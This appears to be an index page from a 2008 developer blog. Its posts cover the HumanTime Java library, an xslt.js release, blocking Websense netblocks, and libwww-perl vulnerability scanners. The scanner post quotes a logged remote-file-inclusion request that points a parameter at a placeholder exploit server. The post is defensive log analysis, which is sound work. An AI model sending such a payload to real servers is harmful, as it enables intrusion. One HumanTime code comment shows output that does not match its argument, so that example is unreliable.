Date Formatting and Parsing for Humans in Java with HumanTime

Posted 2008-10-07 in Java by Johann.

Many applications deal with time. For example by

• printing how long a task will take,
• logging timing information or
• letting users enter time intervals.

For a programmer, the system time in milliseconds is the fastest and easiest way to work with time.

The problem is that understanding and working with milliseconds is easy for computers, but not for humans.

HumanTime changes this.

HumanTime formats and parses time in a way that is easier to read and understand.

Examples

81299 ms versus 1 m 21 s
1222940000 ms versus 14 d 3 h

Which time representation is easier to understand?

Applications that do this well include Jenkins and Twitter:

Get HumanTime

Download HumanTime and the test case.

HumanTime has no dependencies besides Java 5. As usual, the code is released under the MIT License (OSI certified).

Using HumanTime

After downloading HumanTime, create a package called com.eaio.util.text and put HumanTime.java there. You’re done.

Formatting Time

There are two ways to display time in a human-readable format: An approximate and an exact representation. You should use the approximate representation unless you are sure the user is interested in the exact time.

// You’ve found that the job will take 56720083 milliseconds
LOG.info("This job will take " + HumanTime.approximately(56720083L));
// Prints "This job will take 15 h 45 m"

An exactly method is provided for the exact representation.

// You’ve found that the job will take 56720083 milliseconds
LOG.info("This job will take exactly " + HumanTime.exactly(28391L));
// Prints "This job will take exactly 15 h 45 m 20 s 83 ms"

Parsing Time

HumanTime also parses time from user input. The input can contain the time symbols y, d, h, s and ms. Whitespace is ignored, times are cumulative and parsing is case insensitive. An example:

HumanTime t = HumanTime.eval("29 m 30m 100 ms");
LOG.info(t.getApproximately()); // Will print "1 h"
// Or simply use
LOG.info(HumanTime.approximately("29 m 30m 100 ms"));

Other HumanTime Properties

HumanTime instances are thread-safe and can be serialized. In addition to the methods described above, HumanTime instances can also be created directly and modified through the d(), d(int n), h(), h(int n) methods which add one day, n days, one hour and n hours respectively.

Summary

Working with time in a way that is easy for computers is not always easy to understand for humans. HumanTime makes time easier to read and understand.

4 comments

xslt.js version 3.2 released

Posted 2008-08-30 in JavaScript by Johann.

Version 3.2 of xslt.js, my JavaScript library to perform client-side XML transformations, is now available for download.

New Feature

I’ve added the often requested ability to use inline XML and XSLT as arguments in addition to using URIs to this version. Here’s an example.

// If using the regular code
new Transformation()
    .setXml('<?xml version="1.0"?><bla/>')
    .setXslt('<?xml version="1.0"?><xsl:stylesheet …')
    .transform('rofl');

// If using the jQuery plugin
$('#rofl').xslt('<?xml version="1.0"?><bla/>',
    '<?xml version="1.0"?><xsl:stylesheet …');

Thanks to a number of optimizations, the size of xslt.js has stayed pretty much the same.

Gotchas

One thing I spent considerable amounts of time on is on the way Gecko (the rendering engine behind Firefox) handles the MIME types in XMLHttpRequests. By default, my web server sent XSLT files as text/xsl, however, Gecko expects them to be delivered as text/xml (and possibly application/xml). If the MIME type doesn’t match, Gecko returns a null XMLResponse object.

6 comments

Websense and how to Block Web Sense’s Constant Abuse

Posted 2008-08-26 in Spam by Johann.

Websense, Inc. is one of the busiest net abusers. Their stealth scanning never stops.

208.80.193.26 … "GET / HTTP/1.0" 403 4232 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; 3304; SV1; .NET CLR 1.1.4322)" "-"
208.80.193.37 … "GET /blog/music/ HTTP/1.0" 403 4232 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Dealio Toolbar 3.1.1; Zango 10.0.370.0)" "-"

If you go through your own log files, you’ll notice that Websense never uses the same user agent twice (simply to never show up in statistics). Here’s how aggressive Websense is:

$ nice gunzip -c <five weeks of log files> | egrep -c '^208.80.19'
414

Over 400 requests in over a month make Websense a lot more aggressive than vulnerability scanners and forum scanners.

Primarily, the abuse is coming from 208.80.193.0/24.

$ nice gunzip -c <five weeks of log files> | egrep '^208.80.19' | awk '{print($1)}' | sort | uniq -c | sort -r -n
     35 208.80.193.31
     34 208.80.193.44
     33 208.80.193.33
     30 208.80.193.27
     25 208.80.193.37
     25 208.80.193.32
     22 208.80.193.46
     22 208.80.193.30
     21 208.80.193.35
     20 208.80.193.42
     19 208.80.193.45
     18 208.80.193.29
     16 208.80.193.39
     15 208.80.193.40
     14 208.80.193.48
     14 208.80.193.34
     12 208.80.193.47
     11 208.80.193.36
      6 208.80.193.41
      6 208.80.193.38
      5 208.80.193.26
      4 208.80.193.59
      4 208.80.193.50
      2 208.80.193.54
      1 208.80.193.43

Block Websense

Here are Web sense’s netblocks. Block all of them.

• 66.194.6.0/24
• 67.117.201.128
• 91.194.158.0/23
• 192.132.210.0/24
• 204.15.64.0/21
• 208.80.192.0/21

9 comments

Exploit and Vulnerability Scanners using libwww-perl

Posted 2008-08-21 in Spam by Johann.

One of the stranger things I see are the people scanning for vulnerable servers that always use the same libwww-perl user agent, like in this example:

… "GET /inc/irayofuncs.php?irayodirhack=http://<sploit server>/id??%0D?? HTTP/1.1" 403 4232 "-" "libwww-perl/5.805" "-"

These people definitely come around:

$ grep -c '"libwww-perl' <this week’s log>
111

And with the exception of the following outfit, all of the libwww-perl is used only for vulnerability scanning and exploiting of servers.

$ grep '"libwww-perl' <log> | grep -v http
96.244.75.34 … "GET / HTTP/1.1" 403 345 "-" "libwww-perl/5.808" "-"
70.88.158.109 … "GET / HTTP/1.1" 403 345 "-" "libwww-perl/5.808" "-"

Obviously, the first thing you should do is white listing user agents so that none of the libwww-perl dirt can slip through and your server is hacked.

Statistics

The next thing is to take a look at where this scanning is coming from. I am using the last half year of my log files here.

Requests	IP address/Hostname	Hosting	Description
113	216.118.81.182 (216.118.81.0/24)	Site5 hosting, Net Access Corporation, US
63	65.91.249.193 (65.88.0.0/14)	Level3, US
46	217.20.118.202 deltaesports.com (217.20.112.0/20)	netdirekt e. K., DE
41	217.20.116.93 atlas.f2k-server.org (217.20.112.0/20)	netdirekt e. K., DE
40	195.205.178.120 bip.erg-bierun.com.pl (195.205.0.0/16)	Zaklady Tworzyw Sztucznych Erg-Bierun S.A., PL	Black listed on these mail blocklists.
35	80.253.99.164 reds.freshwebhosts.com (80.253.96.0/19)	Commerical Collocation Ltd, UK	Black listed as well.
31	213.228.155.43 smol-srv01.netvisao.pt (213.228.128.0/18)	Cabovisao SA, PT
29	38.117.65.239 (38.0.0.0/8)	Ravand CyberTech Inc, Performance Systems International Inc., US
27	87.230.77.168 johannes.jarolim.com (87.230.0.0/17)	Hosteurope GmbH, DE
27	216.239.69.227 onnet1.onnet.ca (216.239.64.0/19)	VIF Internet, CA

As you can see, the IP addresses are all over the place, geographically and what they’re used for. Also, for half a year, 113 requests isn’t much so each system either runs at a stealthy low scanning rate (unlikely) or the scanner processes are discovered sooner or later and the security holes are plugged (more likely).

I haven’t had one of my servers hacked but one thing I would like to find out if these computers are exploited beyond the vulnerability scanning.

Pages

Page 3 · Page 4 · Page 5 · Page 6 · Page 7 · Page 8 · Page 9 · Next Page »